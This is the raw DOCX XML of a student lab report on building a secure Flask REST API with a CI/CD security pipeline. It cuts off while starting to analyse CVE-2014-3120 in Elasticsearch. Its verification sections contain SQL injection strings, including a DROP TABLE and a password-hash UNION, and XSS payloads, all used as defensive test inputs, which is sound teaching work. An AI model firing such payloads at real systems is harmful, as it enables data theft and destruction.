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HANGZHOU DIANZI UNIVERSITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Information Security Laboratory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>LABORATORY WORK No. 1</w:t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Secure REST API Development with CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>and Real CVE Vulnerability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85"/>
        <w:gridCol w:w="4252"/>
      </w:tblGrid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Variant No.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CVE-2014-3120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Student (Surname, Name)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mahaotian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HDU number (student ID)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23320311</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4677"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Date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 / 10 / 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Repository: https://github.com/mahaotian23320311/work1-secure-api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18"/>
        </w:rPr>
        <w:t>Pipeline:   https://github.com/mahaotian23320311/work1-secure-api/actions/runs/39714222548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1. Purpose of the work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The goal of the work is to walk the full security lifecycle of a small backend service: design it against the OWASP Top 10, automate the security checks in CI/CD, then take a real, publicly documented vulnerability, reproduce it in an isolated environment, explain its root cause, fix it and prove that the fix works without breaking the application.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Two deliverables are produced: a working, hardened REST API with a green pipeline, and a reproducible analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2014-3120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Elasticsearch 1.1.1 using the Vulhub environment.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2. Project and API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2.1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Layer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Choice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Why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Language / framework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Python 3.11 + Flask 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small, explicit, easy to show the security controls in code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Storage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 xml:space="preserve">SQLite via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> with parameterised statements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no ORM magic hides the SQL, so the anti-injection measure is visible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Authentication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PyJWT (HS256) + bcrypt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industry-standard token and password primitives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Tests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pytest (25 tests)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every security property is pinned by a test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CI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GitHub Actions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required by the assignment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CVE lab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Docker Compose + Vulhub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isolated, disposable vulnerable environment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3"/>
        </w:rPr>
        <w:t>2.2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Path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Auth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Purpose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/auth/login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validate credentials, return a JWT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/api/data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Bearer JWT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 xml:space="preserve">list the post feed, optional </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>?search=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/api/notes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Bearer JWT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self-chosen endpoint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: create a note owned by the caller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/api/notes/&lt;id&gt;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Bearer JWT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read one note (owner or admin only)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/api/me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Bearer JWT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current user profile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/health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liveness probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/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three methods required by the assignment are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /auth/login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GET /api/data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (authentication enforced) and the self-chosen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /api/notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>; the rest are supporting endpoints.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Example session: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curl -s -i http://127.0.0.1:5001/api/data</w:t>
        <w:br/>
        <w:t>HTTP/1.1 401 UNAUTHORIZED</w:t>
        <w:br/>
        <w:t>WWW-Authenticate: Bearer realm="api"</w:t>
        <w:br/>
        <w:t>{"error":{"code":"missing_token","message":"A Bearer token is required."}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -X POST http://127.0.0.1:5001/auth/login -d '{"username":"alice","password":"Alice-Passw0rd!"}'</w:t>
        <w:br/>
        <w:t>{"access_token":"eyJhbGciOiJIUzI1NiIs...","token_type":"Bearer","expires_in":1800}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -H 'Authorization: Bearer &lt;token&gt;' http://127.0.0.1:5001/api/data</w:t>
        <w:br/>
        <w:t>{"count":3,"items":[{"id":1,"title":"Welcome to the secure notes API","author":"alice", ...}]}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full 9-step curl transcript is stored in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/curl-transcript.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22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80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pi-smoke-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1 - API smoke test: 401 without a token, 401 on a wrong password, 200 with a valid JWT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3. Implemented security measures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3.1 Protection against SQL injection (A03)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All database access goes through parameterised statements. The query text and the values are sent separately, so a value can never be parsed as SQL syntax.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user = db.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT id, username, password_hash, role FROM users WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    (username,),</w:t>
        <w:br/>
        <w:t>).fetchone()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Supporting details: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 xml:space="preserve">no f-strings, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> formatting or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.format()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> near SQL anywhere in the code base;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 xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?search=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> term is bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wildcards are escaped (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE ? ESCAPE '\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?search=%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not dump the whole table;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table and column names are hard-coded, never taken from input.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Verification — the payloads below are stored as data, not executed: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curl -s -H "Authorization: Bearer $T" "http://127.0.0.1:5001/api/data?search=%27%20OR%201%3D1--"</w:t>
        <w:br/>
        <w:t>{"count":0,"items":[]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tests/test_security.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replays </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1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alice' --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' UNION SELECT id, username, password_hash … --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>'; DROP TABLE users; --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> against both the login and the search endpoint: all are refused or return zero rows, and the table still exists afterwards.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3.2 Protection against XSS (A03)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API answers with JSON, which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically XSS-safe — clients put the JSON into the DOM. Therefore every string is HTML-escaped on the way out (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>escape_deep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app/security.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), and the response carries hardening headers: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Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'</w:t>
        <w:br/>
        <w:t>X-Content-Type-Options: nosniff</w:t>
        <w:br/>
        <w:t>X-Frame-Options: DENY</w:t>
        <w:br/>
        <w:t>Referrer-Policy: no-referrer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Verification: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curl -s -X POST .../api/notes -d '{"title":"&lt;script&gt;alert(1)&lt;/script&gt;","body":"&lt;img src=x onerror=alert(2)&gt;"}'</w:t>
        <w:br/>
        <w:t>{"id":4,"title":"&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;","body":"&amp;lt;img src=x onerror=alert(2)&amp;gt;", ...}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stored markup comes back inert: no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;img onerror&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reaches the client as markup.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3.3 Broken authentication (A07)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>Password storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bcrypt with a per-password random salt and cost factor 12. Two users with the same password get different hashes; a stolen database cannot be turned into passwords cheaply. SHA-256 would be useless here: it is fast by design, so a GPU tests billions of candidates per second.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>Token issuance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — HS256 JWT with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sub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username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role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iss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iat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nbf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exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (30 min) and a random </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>jti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The signing secret comes from the environment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>); if it is absent, a random one is generated at start-up, so no default secret can ever ship.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>Token verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>token_required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks the header shape, decodes with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>algorithms=["HS256"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only (which rejects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alg: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and algorithm-confusion forgeries), requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>iat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>iss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>re-reads the user from the database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, so a deleted or downgraded account cannot keep using an old token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No user enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — an unknown username still costs one bcrypt comparison (against a dummy hash) and returns exactly the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> body as a wrong password.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Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tests/test_api.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains dedicated tests for a garbage token, an expired token, an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alg: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> token, and a token signed with a different key — all four are rejected with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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4. CI/CD pipeline with security scanners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs on every push and every pull request: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Job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Tool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Gate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test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pytest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any failing test fails the run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sast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 xml:space="preserve">bandit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>-ll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any medium/high finding fails the run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sca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pip-audit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any known-vulnerable dependency fails the run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reports are uploaded as build artifacts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bandit-report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pip-audit-report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pytest-report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) and can be downloaded from the run page under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Artifacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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Result of run #8 (the same commands, executed by the pipeline; the bandit step prints its report to the log so the result is visible without downloading the artifact):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pytest -q</w:t>
        <w:br/>
        <w:t>25 passed</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ bandit -r app -x tests -ll</w:t>
        <w:br/>
        <w:t>No issues identified.</w:t>
        <w:br/>
        <w:t>Code scanned: 503 lines of code</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ pip-audit -r requirements.txt</w:t>
        <w:br/>
        <w:t>No known vulnerabilities found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5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tions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2 - GitHub Actions run #8: success, all three jobs green (Tests 17s, SAST 11s, SCA 25s)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61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ast-ban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6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3 - GitHub Actions SAST job log: bandit reports no issues, 503 lines scanned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51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a-pip-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51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4 - GitHub Actions SCA job log: pip-audit reports no known vulnerabilities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5. Selected vulnerability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CVE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CVE-2014-3120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Product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Elasticsearch before 1.2.0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Class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CWE-284 – improper access control (client-supplied code evaluation)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CVSS 3.1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8.1 HIGH (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>; CVSS v2: 6.8)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Published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28 July 2014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Fixed in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1.2.0 (dynamic scripting off by default); sandbox added in 1.4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Known exploited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Yes — CISA KEV, added 2022-03-25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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4677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 xml:space="preserve">NVD, Elastic security page, Vulhub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>elasticsearch/CVE-2014-3120</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/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Elasticsearch exposes a scripting subsystem: a search request may carry a script, and the node compiles and evaluates it inside its own JVM. Before 1.2 the default configuration allowed this for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, with no sandbox and no authentication, so one unauthenticated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /_search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing </w:t>
      </w:r>
      <w:r>
